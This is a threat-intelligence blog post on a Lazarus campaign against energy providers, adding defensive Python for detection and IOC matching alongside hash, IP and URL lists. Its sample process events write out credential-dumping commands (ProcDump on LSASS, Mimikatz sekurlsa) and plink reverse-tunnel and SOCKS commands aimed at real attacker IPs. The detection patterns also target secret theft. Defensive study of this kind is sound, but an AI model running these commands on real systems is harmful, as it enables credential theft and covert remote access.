September 26, 2022

TheCyberThrone

Thinking Security ! Always

Lazarus Group – MagicRAT in action

Researchers have tracked an orchestrated campaign by the North Korea-linked Lazarus APT group against energy providers, including organizations in the US, Canada and Japan. The aim was to infiltrate the victims, maintain long-term access and exfiltrate data.

The attack chain starts with exploitation of Log4j vulnerabilities in VMware products to gain an initial foothold in the enterprise network. Once inside, the threat actors deployed custom implants tracked as VSingle and YamaBot.

VSingle is an HTTP bot that executes arbitrary code received from a remote server and can also download and run plugins. The operators used it for reconnaissance, deployment of further malware and data exfiltration. YamaBot is a backdoor written in Golang.

The nation-state hackers also employed known malware families alongside a previously unknown implant named MagicRAT. This activity was partially documented by Symantec and AhnLab earlier this year.

While the infection chain is similar across the intrusions in this campaign, there are key variations: optional activities that the group carried out in some intrusion sets but not in others.


Below are the variations shared by Talos:

  • Credential harvesting using tools such as Mimikatz and ProcDump.
  • Proxy tools used to set up SOCKS proxies.
  • Reverse tunneling tools such as PuTTY’s plink.
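The three optional activities above are behaviours, not file hashes, so they are best caught on process telemetry. The following is an added example (not code from the Talos report or from this blog) that runs a few argument-based rules over constructed process-creation events. The rules key on command-line syntax rather than image names because the tools in this campaign were dropped under innocuous names; the specific renamed binaries and paths in the sample events are an assumption modelled on the file names in the URL list further down, and the ProcDump, Mimikatz and plink argument patterns are the documented public syntax of those tools.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (what Sysmon EID 1 or EDR telemetry gives you)."""
    image: str
    command_line: str
    parent_image: str


# Constructed events, not from the report. The renamed *.tmp binaries under
# C:\Users\Public are an assumption modelled on the file names in the URL list.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
                 r"C:\Windows\System32\services.exe"),
    ProcessEvent(r"C:\Users\Public\pd64.tmp",
                 r"pd64.tmp -accepteula -ma lsass.exe C:\Users\Public\mm.dmp",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\Public\mi64.tmp",
                 'mi64.tmp "privilege::debug" "sekurlsa::logonpasswords" exit',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\Public\t.tmp",
                 "t.tmp -N -R 8080:127.0.0.1:3389 -P 443 -pw Passw0rd user@185.29.8.162",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\Public\spr.tmp",
                 "spr.tmp -N -D 1080 -P 22 user@109.248.150.13",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Program Files\PuTTY\plink.exe", "plink.exe -ssh admin@10.0.0.5",
                 r"C:\Windows\explorer.exe"),
]

# Each rule is (name, predicate over the raw command line). Rules look at
# arguments, not image names, because the binaries were renamed.
RULES = [
    # ProcDump-style full memory dump of LSASS: -ma <process> <dumpfile>.
    ("lsass_dump", lambda c: re.search(r"(?i)(^|\s)-ma\s", c) is not None
                             and "lsass" in c.lower()),
    # Mimikatz module syntax passed on the command line.
    ("mimikatz_module", lambda c: re.search(
        r"(?i)(sekurlsa::|lsadump::|privilege::debug|kerberos::)", c) is not None),
    # plink/ssh remote forward: -R [listen-ip:]port:host:port exposes an internal
    # service (RDP in the sample) on the attacker's host: the reverse tunnel.
    ("ssh_reverse_tunnel", lambda c: re.search(
        r"(^|\s)-R\s+(?:[^\s:]+:)?\d+:[^\s:]+:\d+(\s|$)", c) is not None),
    # plink/ssh dynamic forward: -D [listen-ip:]port turns the session into a SOCKS proxy.
    ("ssh_dynamic_socks", lambda c: re.search(
        r"(^|\s)-D\s+(?:[^\s:]+:)?\d+(\s|$)", c) is not None),
]


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule each event trips, in input order."""
    hits = []
    for i, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev.command_line):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{rule:20s} {ev.image}  <-  parent {ev.parent_image}")
```

The last sample event (a plain interactive plink session) trips nothing, which is the point of keying on `-R`/`-D` rather than on the tool: administrators use plink too. In a real deployment the parent image is the second filter; a dump or tunnel spawned from a child of the exploited VMware service process is far more interesting than one launched from an admin's shell.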

This research was documented by researchers from Talos.

Indicators of Compromise

VSingle

  • 586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730
  • 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
  • c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
  • dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
  • 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
  • f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
  • 16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5
  • 05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD
  • 6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B
  • 912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9
  • CAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65
  • 2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e
  • 2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780
  • 5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8
  • C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3

IPs

  • 104[.]155[.]149[.]103
  • 40[.]121[.]90[.]194
  • 185[.]29[.]8[.]162
  • 146[.]4[.]21[.]94
  • 46[.]183[.]221[.]109
  • 84[.]38[.]133[.]145
  • 109[.]248[.]150[.]13
  • 155[.]94[.]210[.]11
  • 192[.]186[.]183[.]133
  • 54[.]68[.]42[.]4
  • 213[.]180[.]180[.]154

URLs

  • hxxp[://]104[.]155[.]149[.]103/2-443[.]ps1
  • hxxp[://]104[.]155[.]149[.]103/8080[.]ps1
  • hxxp[://]104[.]155[.]149[.]103/mi64[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/mi[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/mm[.]rar
  • hxxp[://]104[.]155[.]149[.]103/pd64[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/rar[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/t[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/update[.]tmp
  • hxxp[://]109[.]248[.]150[.]13:8080/1
  • hxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php
  • hxxp[://]185[.]29[.]8[.]162:443/1[.]tmp
  • hxxp[://]40[.]121[.]90[.]194/11[.]jpg
  • hxxp[://]40[.]121[.]90[.]194/300dr[.]cert
  • hxxp[://]40[.]121[.]90[.]194/b[.]cert
  • hxxp[://]40[.]121[.]90[.]194/qq[.]cert
  • hxxp[://]40[.]121[.]90[.]194/ra[.]cert
  • hxxp[://]40[.]121[.]90[.]194/Rar[.]jpg
  • hxxp[://]40[.]121[.]90[.]194/tt[.]rar
  • hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe
  • hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe
  • hxxp[://]84[.]38[.]133[.]145/board[.]html
  • hxxp[://]84[.]38[.]133[.]145/header[.]xml
  • hxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php
  • hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
  • hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
  • hxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp
  • hxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp
  • hxxps[://]tecnojournals[.]com/review
  • hxxps[://]semiconductboard[.]com/xml
  • hxxp[://]cyancow[.]com/find
  • hxxp[://]155[.]94[.]210[.]11/news/page[.]php
  • hxxp[://]192[.]186[.]183[.]133/bbs/board[.]php
  • hxxp[://]213[.]32[.]46[.]0/board[.]php
  • hxxp[://]54[.]68[.]42[.]4/mainboard[.]php
  • hxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php
  • hxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php
  • hxxp[://]www[.]easyview[.]kr/board/Kheader[.]php
  • hxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php
  • hxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php
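The indicators above are published defanged (`hxxp`, `[.]`, `[://]`) and the hashes mix upper and lower case, so they cannot be dropped into a log search as-is. The following is an added example (not code from the report or from this blog) that refangs a subset of the list copied from above, sorts the indicators into hash, IP, URL and host sets, and runs them over constructed proxy log lines and a constructed file-hash inventory. The proxy log format and the inventory are assumptions for the example; the generalisation beyond the page is that a URL indicator also yields its host, so a hit on the same server with a different path is reported as a weaker "host" match rather than missed.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# Subset of the defanged indicators listed above, copied in the form the
# report publishes them (bracketed dots, hxxp scheme, mixed-case hashes).
DEFANGED_IOCS = """
586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730
8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
104[.]155[.]149[.]103
40[.]121[.]90[.]194
hxxp[://]104[.]155[.]149[.]103/update[.]tmp
hxxp[://]109[.]248[.]150[.]13:8080/1
hxxps[://]tecnojournals[.]com/review
hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
"""

# Constructed proxy log lines (not from the report): time, client, method, URL, status.
SAMPLE_PROXY_LOG = [
    "2022-09-20T10:14:03Z 10.1.2.3 GET http://104.155.149.103/update.tmp 200",
    "2022-09-20T10:14:05Z 10.1.2.3 GET http://104.155.149.103/favicon.ico 404",
    "2022-09-20T10:15:11Z 10.1.2.9 GET https://www.example.com/ 200",
    "2022-09-20T10:16:40Z 10.1.2.3 POST https://TecnoJournals.com/Review 200",
    "2022-09-20T10:17:02Z 10.1.2.7 GET http://www.ajoa.org/home/index.php 200",
    "2022-09-20T10:18:30Z 10.1.2.7 GET http://109.248.150.13:8080/status 200",
]

# Constructed file inventory (path -> SHA-256), as an EDR or hashing sweep would produce it.
SAMPLE_INVENTORY = {
    r"C:\Users\Public\update.tmp":
        "586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730",
    r"C:\Windows\System32\notepad.exe":
        "0000000000000000000000000000000000000000000000000000000000000000",
}

SHA256_RE = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
URL_IN_LOG_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def refang(value: str) -> str:
    """Reverse the defanging used in the list: hxxp -> http, [://] -> ://, [.] -> ."""
    v = value.strip()
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    return v.replace("[://]", "://").replace("[:]", ":").replace("[.]", ".")


def load_iocs(text: str) -> Dict[str, Set[str]]:
    """Refang each line and sort it into hash, IP, URL and host sets (lower-cased)."""
    iocs: Dict[str, Set[str]] = {"sha256": set(), "ip": set(), "url": set(), "host": set()}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        value = refang(raw)
        if SHA256_RE.match(value):
            iocs["sha256"].add(value.lower())
        elif IPV4_RE.match(value):
            iocs["ip"].add(value)
        elif "://" in value:
            url = value.lower()
            iocs["url"].add(url)
            host = urlsplit(url).hostname  # strips the port, e.g. :8080
            if host:
                iocs["host"].add(host)
    return iocs


def scan_proxy_log(lines: List[str], iocs: Dict[str, Set[str]]) -> List[Tuple[int, str, str]]:
    """Return (line index, level, indicator). 'url' is an exact hit; 'host' means only the
    server matched, which still deserves a look because C2 paths vary between samples."""
    hits = []
    for i, line in enumerate(lines):
        m = URL_IN_LOG_RE.search(line)
        if not m:
            continue
        url = m.group(0).lower()  # case-insensitive on purpose: hunting favours recall
        host = urlsplit(url).hostname or ""
        if url in iocs["url"]:
            hits.append((i, "url", url))
        elif host in iocs["ip"] or host in iocs["host"]:
            hits.append((i, "host", host))
    return hits


def scan_inventory(inventory: Dict[str, str], iocs: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Match file hashes against the list after normalising case on both sides."""
    return [(path, h.lower()) for path, h in inventory.items() if h.lower() in iocs["sha256"]]


if __name__ == "__main__":
    loaded = load_iocs(DEFANGED_IOCS)
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG, loaded):
        print("proxy hit:", hit)
    for hit in scan_inventory(SAMPLE_INVENTORY, loaded):
        print("file hit:", hit)
```

Two caveats worth keeping in mind when reusing this against the full list: several of the URL indicators sit on what look like compromised legitimate websites, so a host-level hit on those should be triaged rather than blocked outright, and the hash comparison is only as good as the inventory feeding it, since the `*.tmp` droppers in this campaign were written to disk under throwaway names.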